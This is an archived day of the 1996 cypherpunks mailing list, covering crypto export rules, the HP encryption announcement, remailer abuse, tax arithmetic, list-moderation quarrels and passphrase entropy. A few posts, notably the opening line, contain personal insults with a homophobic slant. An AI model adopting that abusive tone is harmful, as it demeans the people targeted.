You forgot "limp-wristed, EFFeminate, bearded, 50-ish blonde".

Thanks for the comments, Dale.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:30:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EFF Board, again
In-Reply-To: <199611151742.JAA20332@mailmasher.com>
Message-ID: <2oXHXD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@huge.cajones.com (Huge Cajones Remailer) writes:
> Tim O'Reilly's been talking publicly about starting a "Sierra Club"
> which would "protect" the "environment of the Net".  What does he want
> to do?
>
> It might be a way to tell companies what kind of software they can
> publish and at what price.  ORA has been having trouble competing with
> Microsoft.  Naturally, they cast themselves as altruistic good guys.
>
> Whatever O'Reilly is talking about, it sounds like more trouble from
> the general vicinity of the EFF Board.

I think EFF's credibility has been pretty much destroyed by John Gilmore's
censorship and plug-pulling. ORA puts out good books. As a publisher, they
should reconsider being affiliated with a censorour setup like EFF.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Sat, 16 Nov 1996 12:16:32 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Giving Kill Files a Workout...
Message-ID: <3.0b36.32.19961116114021.01089e6c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 AM 11/16/96 -0800, Dale Thorn wrote:
>Alan Olsen wrote:
>> What a week!  What is this?  "Net Loon pig-pile on Cypherpunks day?"
>> So far i have killfiled three people in the past two days.  (That is the
>> total number I filtered to trash before that date.)
>> For those of you who are sick of wading through this mess, I am willing to
>> show you what it will take to filter those of your choice to /dev/null or
>> its local equivelent. (procmail can be your friend!)
>
>Thank you in advance for your filtering instructions (yawn).
>
>BTW, why would anyone give a shit whether you killfiled anyone or not?

The point is not who or what I care to killfile.  The idea is that it can
be done by most people without a whole lot of hastle.

There are a number of people who do not have experience in setting up
procmail.  I am offering to help them out in the hope that it will strain
out some of the resultant noise from these "Freedom Knight" loons.  (Or at
least keep a number of people from dropping the list from the bogosity.)

I suspect I am in a number of killfiles already...

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 16 Nov 1996 09:18:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <1.5.4.32.19961116132534.00685bf4@ix.netcom.com>
Message-ID: <Pine.LNX.3.95.961116121708.769B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 16 Nov 1996, Clay Olbon II wrote:

> At 08:06 PM 11/14/96 -0800, you wrote:
> >> 
> >> I'm still mildly curious as to why support for >128 bit keys is not
> >> available in any form I know of.
> >
> >	What do you mean? 3DES ships with Stronghold, and will ship
> >with C2Net's other products as well.
> 
> Yes, but I believe 3DES has an effective key length of only 112 bits.  Of
> course, even this is more than sufficient for a long time to come. 

3DES can have an effective key length of 168 bits if 3 keys are used instead
of two.  There are no security problems that I know of from using 3 keys.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMo332izIPc7jvyFpAQE8ZggAmtBzP2/B72Q++Ce4Yw2Iz/eBJsPf3kNq
nM6BrUZArHSRgNXp4/g/DLmBrfw1cRO5X1P1sEfNd0OPo/VnjKjNEhqBea/lZlW4
0GwOnXbotHDlthz/t1POiHV2yMy7EvDelVZynuEIoqpE2/6koxJ/DJjD27t++6ka
atGAXbCKgsS68JQOCzZT2r1webXIlqbouKKpSiTFDTTS2jnSiFBa3CE89U7Udbbw
Fvg+sUGicxN2f9PzuE+x1PGJLaHHbqMcz1ObyJWyIljNERpgGrV6LEwIccq/k8hn
2ikFb8EvnIQXtUCtghDztr8nOLWhGUMrO2pFvV4Cr5BeSO1DWXs1qA==
=fVkb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 16 Nov 1996 09:36:15 -0800 (PST)
To: apteryx@super.zippo.com
Subject: "Strong" crypto and export rule changes.
In-Reply-To: <3290d021.3724525@super.zippo.com>
Message-ID: <199611161733.MAA04178@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	What the US government will allow to be exported is not "strong
encryption."  It is encryption only slightly too strong to be broken
by an amateur effort.  For the right investment in custom hardware, it
falls quickly.  (500,000 $US = 3.5 hour avg break).

	Contrast this to strong cryptography, which if you spent the
entire US GDP on cracking hardware, you have a chance of breaking it
before the heat death of the universe.  (Of course, thats a smaller
probability than winning the lottery on a single ticket.)

	They're not letting out anything that they couldn't break
years ago.  They're not really improving the competitiveness of
American business.  They may be allowing change in what will be
deployed in the US, but it won't really change becuase of the
paperwork requirements.

	In other words, the surveilance state is still winning, and
American business is still losing.

Adam


| It sure looks like it, the following quotes from CNN's web page:
| 
| http://www.cnn.com/TECH/9611/15/encryption.reut/index.html

| "The technology will make it possible to export products containing
| so-called "strong encryption," which have not been exportable under
| national security laws dating back to the Cold War. "




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sat, 16 Nov 1996 12:50:45 -0800 (PST)
To: frantz@netcom.com
Subject: RE: ideal secure personal computer system
Message-ID: <19961116205006455.AAA175@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


>Igor Chudov @ home (ichudov@algebra.com) said something about Re: ideal secure personal computer system on or about 11/16/96 7:41 AM

>
>Bill Frantz wrote:
>> Protection against strangers walking up to your machine and using it is
>> nice, and easy to do.  Protection against viruses which install Trojan
>> horses in your system would also be nice, but is very hard to do in systems
>> where programs run with all the privileges of their users.  Examples
>> include (in alpha order): DOS, MacOS, Unix, and Windows (including NT).
>
>I wonder what are the operating systems where programs may be run with
>_less_ privileges than the user who starts them? Is VMS one of such 
>systems?
>
>thanks
>
>	- Igor.
>End of message


In WinNT a program may impersonate a user such as Guest. Also, trojan horses are ineffective in NT as typical users do not have write permission to system binaries. 

--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mael@umcc.umcc.umich.edu (Reza Beha)
Date: Sat, 16 Nov 1996 10:10:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP does it
Message-ID: <m0vOpBd-001YzgC@umcc.umcc.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.cnn.com/TECH/9611/15/encryption.reut/index.html
                                      
            Hewlett-Packard to unveil encryption 'breakthrough'
                                      
                                 encryption
                          links November 15, 1996
                        Web posted at: 9:00 p.m. EST
                                      
   PALO ALTO, California (Reuter) -- Hewlett-Packard Co. said Friday that
    it will unveil technology Monday that will provide a breakthrough in
    the long-deadlocked debate over use of software encoding for secure
                               data traffic.
                                      
    If the encryption technology has won the backing of industry and the
    U.S. and other governments -- which Hewlett-Packard officials say is
     the case -- the development could eliminate a key obstacle to the
              growth of electronic commerce via the Internet.
                                      
      Hewlett-Packard Chairman Lewis Platt will provide details on the
      technology, which includes technology patented by the Palo Alto
     computer giant as well as other technologies, a company spokesman
                                   said.
                                      
      Technology from RSA Data Corp. the de facto standard-setter for
    Internet security, will be involved Hewlett-Packard officials said.
                                      
   Senior Microsoft Corp. and Intel Corp. executives were also scheduled
       to attend Monday's news briefing at the National Press Club in
                Washington, Hewlett-Packard officials said.
                                      
     The technology will make it possible to export products containing
    so-called "strong encryption," which have not been exportable under
            national security laws dating back to the Cold War.
                                      
      Under national security law, the U.S. government has allowed the
       export of software and other computer products containing only
                   "weaker" data encryption technologies.
                                      
   Encryption has been classified as a munition because of its potential
    for use by terrorists, spies or other criminals to conceal messages.
                                      
   Encryption programs use mathematical formulae to scramble confidential
   information, such as electronic mail messages or credit card numbers,
     rendering them unreadable to computer users without a password or
             "software key" that can decode the coded material.
                                      
     For years the domestic computer industry has complained that such
     government restrictions have hampered its competitiveness in world
        markets, and that its customers did not necessarily want the
               government to be able to decode internal data.
                                      
   The industry says the laws have prevented it from offering some of the
     most recent Internet technologies, even within the United States,
      because it is impossible to prevent computer users outside U.S.
   borders from gaining access to technologies publicly available on the
                                 Internet.
                                      
      Companies and their customers want to use encryption to protect
            confidential communications and electronic commerce.
                                      
    Silicon Valley executives recently noted that consumer devices, such
      as WebTV Network's Web-browsing television device that hit store
   shelves this autumn, use the same levels of strong encryption as used
                            in military systems.
                                      
    WebTV said it is using keys composed of 128 bits, or characters, of
     data to encode and decode its communications to its set-top boxes
   providing consumers with the best level of security available over the
                                 Internet.
                                      
   The government recently proposed that the constraint be eliminated by
    providing a key recovery system, in which authorities could recover
     keys to crack messages if they received a court warrant to do so.
                                      
             Industry has rebuffed this as difficult to manage.
                                      
      The solution being offered by Hewlett-Packard would be flexible,
       allowing customers to use the levels of encryption required by
                  different governments, the company said.
                                      
    "This is going to allow very strong encryption," said a spokeswoman.
                                      
   Hewlett-Packard said its technology would provide a means of "solving
       the data security and integrity issues that have impaired and
    frightened users and companies from exploiting the full power of the
                                 Internet."
                                      
            Copyright 1996 Reuters Limited. All rights reserved.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sat, 16 Nov 1996 10:10:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE] aga isn't on cypherpunks... (and I'm glad)
Message-ID: <9611161810.AA03185@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text



all,

"aga@dhp.com", that 'aga' guy, is NOT subscribed to cypherpunks.

What has and is going on is that he was blindly Cc'ing cypherpunks
on everything he wrote that had to do with this... 

I exchanged some mail with the guy, he didn't understand AT ALL that
"cypherpunks@toad.com" was a mailing list address. He seemed to think
that he had to be "subscribed" to the list in order for any traffic
to goto it.

When I pointed out to him that this was not the case, his attitude was
that it was not his fault and that the list was "broken" etc.

If you havn't figured it out, BELIVE ME, talking to this guy is a
definative waste of packets.

He's ranting with basicly no clue about how he's doing the ranting...
And this stuff has now been cross-posted to about 6 newsgroups by
him, in addtion to the 3 mailing lists he's been sending it to.

I ended up asking him why he wasn't jsut cutting to the chase and
posting "Make Money Fast" stuff instead. (he didn't seem to get it.)

I'd suggest ignoring him & hoping he goes away. As it is it was a MAJOR
mistake of mine to even attempt to interject sanity into the whole
stupid thread on this... Why? Because there's better things to worry
about in life. Like this H/P crypto announcment... Or anything crypto
related for that matter. As it is the thread continues like some bad
crack-addled version of the energizer bunny. 




Tim



PS, I just realized my dog does better at staying focused on doing tricks 
that this list does on staying focused on crypto... That's a bit scary. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sat, 16 Nov 1996 13:29:56 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Remailer Abuse Solutions
Message-ID: <v02140b03aeb3dd600b95@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:38 PM 11/15/1996, Adam Back wrote:
>Peter Hendrickson <ph@netcom.com> writes:
>> However, if you restrict postings to an approved group of people, perhaps
>> everybody on the mailing list, you can eliminate spam.  How, then, do we
>> allow anonymous postings to come through?  Individual people on the list
>> can receive the proposed post and forward it to the list if it is
>> appropriate.  They could even charge a fee for doing it.  That's easy to
>> do if there is a "paying" remailer which will handle the money for them.

> Not necessarily a good idea.  The post may be a hot potatoe, and the
> forwarder may find themselves in legal trouble.  (Say RC4 & RC2 source
> code, NSA handbook, the results of the Mykotronic's dumpster diving
> spree, etc).  Exercising `editorial control' has landed some ISPs in
> trouble, to the extent that some are specifically avoiding it for that
> legal reason alone.  Being _paid_ for forwarding the message may make
> that even worse.

Yes, this is the part of my proposal with which I felt least comfortable.
Actually, not to flog a dead horse or anything, this is a perfect
application for semi-anonymous authentication.  Anybody on the list
could forward the mail, but nobody need know exactly who sent it.

> Howabout someone liberates skipjack and forwards it to you via
> remailers with $50 for your trouble.  Do you bite?  I thought not, NSA
> interviews, ITAR violation, etc.

Well, there are ways to do this.  For instance, you can send it
to a bunch of other people anonymously at, say, a dollar each.
It will get around quickly, albeit at greater inconvenience and
a higher cost.  But, for something this important that would be
acceptable.

> Ecash for email works better to stop spam sent directly to email
> addresses where you don't cash the money as a curtesy, and your
> software junks if it doesn't have valid ecash.  Email spam itself is
> getting mildly annoying lately, I get a couple a day average at the
> moment.

Except most people don't have e-cash accounts, software that handles
e-cash, or the interest in keeping a site which is secure enough
to handle e-cash.  This is the feature of having the remailer operator
deal with it.  The technology can be introduced to the existing
system with minimal hassle and cost.  All you need is one remailer
operator to do it.

Incidentally, a similar idea can be used to handle flooding attacks
on remailers.  A bad person could take down a remailer by directing
many encrypted packets to it that did not contain any payment.  This
is hard to solve, of course, because the mail all comes from other
remailers.

The solution is for the remailer itself to not accept mail from
other machines that do not pay.  The other remailers in the network
make a payment themselves (out of money they already received)
to make it worthwhile for the remailer to look inside the message
and see if there is even more business.

Does anybody know if military communications systems ever
take this approach?  I know that a highly redundant network is
used when any part of it can be taken out.  What is awkward about
this is that everybody wants to send messages at the very same
time the bandwidth is attenuated; i.e., during battle.

I'm guessing that in practice everybody in the network - all of
whom are basically trusted and identifiable - is ordered to send
only urgent traffic.

But, it would be neat if there was a way to budget bandwidth for
every unit, just like we do for ammunition.

Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sat, 16 Nov 1996 13:37:02 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Remailer Abuse Solutions
Message-ID: <v02140b04aeb3e32566af@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:38 PM 11/15/1996, Adam Back wrote:
>Peter Hendrickson <ph@netcom.com> writes:
>> However, if you restrict postings to an approved group of people, perhaps
>> everybody on the mailing list, you can eliminate spam.  How, then, do we
>> allow anonymous postings to come through?  Individual people on the list
>> can receive the proposed post and forward it to the list if it is
>> appropriate.  They could even charge a fee for doing it.  That's easy to
>> do if there is a "paying" remailer which will handle the money for them.

> Not necessarily a good idea.  The post may be a hot potatoe, and the
> forwarder may find themselves in legal trouble.  (Say RC4 & RC2 source
> code, NSA handbook, the results of the Mykotronic's dumpster diving
> spree, etc).  Exercising `editorial control' has landed some ISPs in
> trouble, to the extent that some are specifically avoiding it for that
> legal reason alone.  Being _paid_ for forwarding the message may make
> that even worse.

> Often the posts which would get the anonymous poster (or the true name
> forwarder) into the most troublle, are the ones which are most
> interesting, and also very on topic.

(In case you get this out of order, this is my second response.)

Another way to have anonymous posting but not be subjected to spam
and the like is to dispense tokens every week to the subscribers.
They can be signed blindly so that anonymity is preserved, just
like e-cash.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sat, 16 Nov 1996 14:18:31 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: It Used to Be Eric's Inscrutable Deficiency
Message-ID: <01BBD3C9.2396E740@king1-10.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


In glancing through and deleting so many messages about how blasphemous and perverted John Gilmore is for having "censored" one list afficionado (more symbolically than in actual fact), I am amused to recall that it used to be Eric Hughes who was the bad guy identified as the Egotistical Slave Master who abused his ownership privileges.    Now he's left the list, it is JG who gets the drift & drivel about list management.

Strange, too, that those who clamor for freedom of speech are accusing JG of being contrary to his principles.   They expect that just because individuals should be at liberty to speak, everyone must therefore be prepared to tolerate all manner and kind of insults against themselves (or be a passive witness to it).

In that case, it would mean that because individuals are to be free "to do" as they will, therefore that courtesy and manners are no longer valid, that high standards of personal behavior are not important, that self-command is not required, that exercising one's best judgement is of no practical value for life in the real world.

It would mean that in the environment of liberty, it would be incorrect for individuals to prevent assaults against themselves or their morals, against their personal preferences, or against their choice of topics for a discussion list which they started.  This would mean that, for instance, it wouldn't be right for free individuals to prevent from being sexually molested, because it would be "censorship" against the perpetrator.

These complaintants against censorship must not understand the purpose for freedom of action, of expression, etc.; that they do not understand the need for being "free":   

it is so that one may, without interferance from uninvited participants, engage in arranging the elements of one's existence for the greatest benefit to oneself.   Tolerating insulting drivel does not fall into that category.

The environment of liberty to express oneself also permits the exercise of the highest logic possible to an unfettered intelligence.  Filling up the mailing list with irrelevant accusations about bizarre sexual practices is not of any logical benefit towards enlightenment on the subjects of encryption or privacy.   

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 12:10:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
In-Reply-To: <Pine.SUN.3.95.961115111117.23903H-100000@viper.law.miami.edu>
Message-ID: <o24HXD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu> writes:

> I think there's some funny accounting here...

Creative accounting is the name of the game. Pay attention, IRS...

> On Tue, 12 Nov 1996, Joseph M. Reagle Jr., for whom I have considerable
> respect and who ordinarily posts very sensible things but appears to have
> lent his account to someone else appeared to have written:

Another one of John Gilmore's electronic forgeries and fabrications (EFF)?

> > o TAXES THOUGHT EXPERIMENT
> >
> >  1) I generate $100 of productivity for my company
>
> I will assume you measure productivity by "sales".

No, I think he understands that the cost of good sold and other costs are
taken out of "sales" to compute his contribution.

> Note also that it's debatable whether this $100 of sales is exactly "your"
> productivity.  In some sense it's really the company's, ie a joint product
> of your labor, their capital, and the labor of other people in the
> production/sales chain:

And of course you use the infrastructure paid for with your taxes and
other people's taxes (state and federal).

> Note also that the analysis that follows is not really affected by whether
> you meant "sales"  or "my contribution to the sale".
>
> >  2) Company is taxed %30, $70 left
>
> No.  Company is NOT taxed on gross sales. Corporate income tax does not
> work like sales tax.  With some minor exceptions relating to pass-through
> rules, foreign sales, and some complex timing issues, corporate tax is
> ordinarily levied on NET PROFITS.  Thus, the company first deducts all the
> "costs" it can identify, even if those were not necessarily involved in
> producing that (or any) sales.  E.g.  advertising, your salary, corporate
> junkets, rent, etc.  And lets not forget corporate tax sheltering too...

In Germany, a company can put practicially inlimited amounts of money into
tax-deductible reserves. E.g., you can estimate that once in ten years you'll
be unable to collect a debt of 10DEM. Every year you set aside 1DEM as a sort
of self-insurance reserve. The revenue authorites don't bother you if the
assumption of 10DEM every 10 years is overly pessimistic. Therefore German
corporations generally pay little income tax.

> >  3) Company pay shareholders and costs, $30 is left
>
> Again, no.  Shareholders come AFTER payroll and costs.

Dividends are NOT tax-deductible in the U.S. On the other hand, interest is.
Therefore it's sometimes more profitable for a company to raise money by
issuing bonds (debt) and paying tax-deducuble interest than by selling its
stock (equity) and paying non-decuctible dividentds to stockholders.

> >  5) I pay 40% in taxes, so $18 left
>
> I'm afraid you are conflating the MARGINAL rate (and when you consider
> federal, state and local taxes varies by state) with the AVERAGE rate.
> Here in FL. for example there is no state or local income tax.  With tax
> sheltering, mortgage deductions etc. no one pays 40% -- the middle class
> pay a lower average rate, the upper class pay a much lower average rate.

That varies with the locale - here I pay the federal income tax plus the New
York State income tax plus the New York City income tax. I once had a job offer
from IBM at $79K/year in Boca Raton (which I eventually didn't take anyway) -
it's a ridiculous salary in NYC, but a decent one in Florida.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apteryx@super.zippo.com (Mark Heaney)
Date: Sat, 16 Nov 1996 06:41:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A New Crypto Announcement--Could be Ominous
In-Reply-To: <v03007803aeb2869761df@[207.167.93.63]>
Message-ID: <3290d021.3724525@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Nov 1996 12:49:55 -0800, you wrote:

[snip]
>----end of item---
>
>It sounds ominous to me. Another backroom deal, probably for some form of
>key recovery strategy, aka GAK.
[snip]

It sure looks like it, the following quotes from CNN's web page:  

http://www.cnn.com/TECH/9611/15/encryption.reut/index.html

make it pretty clear that US government-approved export of strong
cryptography is part of the announcement. What else could it be except
gak? 

"If the encryption technology has won the backing of industry and the
U.S. and other governments -- which Hewlett-Packard officials say is
the case -- the development could eliminate a key obstacle to the
growth of electronic commerce via the Internet. "

and

"The technology will make it possible to export products containing
so-called "strong encryption," which have not been exportable under
national security laws dating back to the Cold War. "

Mark


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMo3R9N36bir1/qfZAQFGvgMAv274G+Gqaf5RsKkcofh4LJfDjHioKqVU
bc+TPQZJSqDRnXbEpdkKlRGznN7+LPCKXyq/tsIT5PpNBJdyLDJJ9pzrwpGIHDCK
6Qiwa4qWEeye9Lj2YTvLLyQNXcDYgMLr
=O/qi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 16 Nov 1996 14:41:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Final Solution to the Crypto Problem
In-Reply-To: <199611161913.LAA01571@crypt.hfinney.com>
Message-ID: <v03007800aeb3f127e77a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 AM -0800 11/16/96, Hal Finney wrote:
>>From the article
>	<URL:http://www.sjmercury.com/business/compute/encrypt1115.htm>:
...
>> The key is that the encryption circuitry would be inactive in exported
>> machines, unless both buyer and seller obtained all legally required
>> licenses to turn it on.
>>
>> Domestic customers, and export buyers with a license, would get a special
>> key card to turn on the encryption, according to HP. Manufacturers would
>> thus be relieved of the burden of making different computers for export
>> than for domestic use.
>
>So it sounds like the idea is to build crypto around card tokens.  I think
>HP has been pushing this for some time.  The question is, will this somehow
>become the only way to get access to crypto?

And this is the "nightmare scenario" we have talked of for so long: make a
method ubiquitous, but with bones thrown to domestic users...then take away
the bones.

Namely, once the infrastructure is deployed, once most electronic commerce
is handled via card tokens (and card readers are actually pretty cheap, and
volume will drive the price down further), the President can cite some kind
of national emergency, or widespread tax evasion, or whatnot, to announce
that beginning on suc-and-such a date all cards must be licensed, even to
domestic users.

(Many of us thought this has always been the strategy with supposedly
voluntary programs, which Clipper was, of course. Our principal objection
was not that the FBI would use Clipperphones, but that the technology and
related announcements were quite clearly oriented toward getting lots of
people to use the technology, thus establishing de facto access to keys.)

>It is certainly very disturbing to see these new moves.  Obviously a great
>deal of behind the scenes negotiations and pressure has been occuring.

The history of the whole crypto debate these last several years has been
the history of a series of behind-the-scenes meetings, pressurings, and
eventual cave-ins. In all of the iterations of Clippper, we heard about the
programs after corporate "buy-ins" had occurred. (Though in the case of
Clipper, there were some "trial balloons" floated six months earlier, as
you may recall.)

The only hope I see is that in each of these iterations, a different set of
companies got burned by the experience: AT&T, TIS, IBM/Lotus, and now the
latest round of players. (Each of these losers from defunct early rounds of
the Great Clipper Race must feel jilted.)

This one may be the Final Solution to the Crypto Problem, given the
building crescendo of crypto news, the new Congress and new term for the
President,  and the simultaneous announcement of the new Emergency Order
and the RSA-HP-Intel-Microsoft-etc. deal. Hardly coincidental.

Be afraid. Be very afraid.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 16 Nov 1996 14:46:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Passwords as Galaxies, and Status of the Archives
In-Reply-To: <v03007804aeb31c5c2260@[207.167.93.63]>
Message-ID: <v03007801aeb3f542de2d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 AM -0800 11/16/96, Lucky Green wrote:
>I think it was "Passwords are galaxies in hyperspace". I may be wrong.
>Either way, this was an excellent tread.
>

Dale Stimson found it, and sent it to me. It's included below. It dated
from June of 1995, not 1996. I don't know why I thought it did.


From: tcmay@netcom.com (Timothy C. May)
Message-Id: <199506081711.KAA09665@netcom8.netcom.com>
Subject: Passwords as Galaxies in Hyperspace
To: sandfort@crl.com (Sandy Sandfort)
Date: Thu, 8 Jun 1995 10:11:19 -0700 (PDT)
Cc: cypherpunks@toad.com
In-Reply-To: <Pine.SUN.3.91.950608081241.3725A-100000@crl12.crl.com> from
"Sandy Sandfort" at Jun 8, 95 08:41:22 am
Sender: owner-cypherpunks@toad.com

Sandy Sandfort wrote:

> I've never really questioned the statements that knowledgeable
> C'punks have enunciated about passphrase entropy.  I've just
> accepted the "rules" on faith.  I choose long "nonsense"
> passphrases with quirky spelling, characters and punctuation.

Adam Shostack just gave a good response, based on how programs like
"crack" will try various substitutions on names, common phrases, etc.

I want to give an explanation that is more "hyperdimensional" (you'll
see what I mean in a moment).

> The question I have, is "quessability" all that important a
> consideration?  For example, let us say I started out with the
> following phrase as a "seed":
>
> 	the quick red fox jumped over the lazy brown dog
>
> To convert it into a passphrase, what if I only changed "dog"
> to "d0g"?  Though it would obviously be easy for me to remember,
> I don't see how it would be any easier for an attacker to guess
> this passphrase than it would be if the passphrase were an
> equally long string of randomly generated characters.  The

Because a program can store the most common names and phrases and then
generate a whole bunch of one-character or one-word variants. That is,
the phrase above can be stored and then perhaps 1000 variants can be
tried...missing characters, "blue" instead of "brown," "snazzy"
instead of "quick," etc. This sounds like a lot of variants to try,
but remember that we're talking about a search space that is 10^75
bytes or higher! Anything that helps reduce this search space is useful.

> reason I (I'm sure naively) think this is so, is that to the
> best of my understanding, passphrases are all or nothing--you
> have to guess it 100% correctly or it doesn work.  Even if an
> attacker tries my "seed" because it is a common typing practice,
> it hardly puts him any closer to guessing which one of the
> zillions of ways I may have modified that phrase, if indeed, I
> used that phrase at all.

Oh, but it puts him a _lot_ closer!

> So I guess what I'm asking is:  if my passphrase is very long,
> and I add at least some randomness, is the fact that my original
> famous quote might be tried as part of a "Bartlet's attack, all
> that much of a threat?

Imagine all passwords and passphrases (same thing, actually) occupying
a high-dimensional space...I won't get into what the dimensions are
here--see any good book on information theory, especially Pierce's
"Symbols, Signals and Noise."

The "points" in this space are the passwords/phrases. With a
old-generation 8-character max on passwords, for example, this space
has something like 26^8 = 2 X 10^12 points in it, if only single-case
alphabetic characters are used. If both upper- and lower-case
characters can be used and standard punctuation marks can be used, the
space explodes in size to roughly 75^8 = 10^16 points.

In this space, there are "galaxies" or "clusters" of points
surrounding such points as "sandy" and "tim." Smart cracking programs
will start with thousands or even millions of these points and then
explore the "nearby" variants, as these nearby variants are what
people will often pick as passwords, thinking they are "outsmarting"
the computers!

Extending this to 30-character or even 50-character pass _phrases_ has
identical math, except the numbers are _much_ larger, and the
"universe" is much vaster.

Somewhere in that universe is the phrase "the quick red fox.....",
surrounded by a large cloud of points a short Hamming distance away:
"the quick red fob...," "the quick red fux...," etc. And in that same
galaxy, albeit a little furhter away, are the variants on entire
_words_. Still further out from the "galactic core" are such phrases
as "the quickest red cat...."

Searching in these galaxies still beats searching the entire space. In
any case, if one is to try searching the entire space, starting in the
galaxies makes more sense.

(In practice, an entire 10^75 point space will not be searched by
brute force, I am sure. And, in practice, I have no idea how far out
in the "arms" of the "galaxies" the NSA's supercomputers will
venture....)

A question one might ask is what gives "shape" to this universe? Why
do I say there's a "galaxy" of points surrounding "sandy" or "the
quick red fox...."? Why not a galaxy around "g*E@ks)hc"?

This gets to the culture-dependent aspects of "randomness" and
"entropy."

Fact is, just as Sandy thinks starting with "the quick red fox..." or
some other easily memorizable phrase is a good strategy, so too will
computers. All a matter of entropy.


I hope this explanation helps. I'm partial to geometrical and
space-oriented descriptions, and reading Pierce's explanation of
Shannon's Theorem in terms of n-dimensional spaces was one of the
highpoints of my high-school experience, lo those almost 30 years ago.

(The n-dimensional model neatly explains a lot of things, including
signal-to-noise ratios, the effects of signal power, correlation
between signals, and error-correcting codes. Great stuff!)

--Tim May



--
..........................................................................
Timothy C. May         | "I am not now, nor have I ever been, a member of
tcmay@netcom.com       |  a militia group."
Corralitos, CA         |  --Tim May's statement before the 1995 Hearings
                       |    of the House Un-American Activities Committee
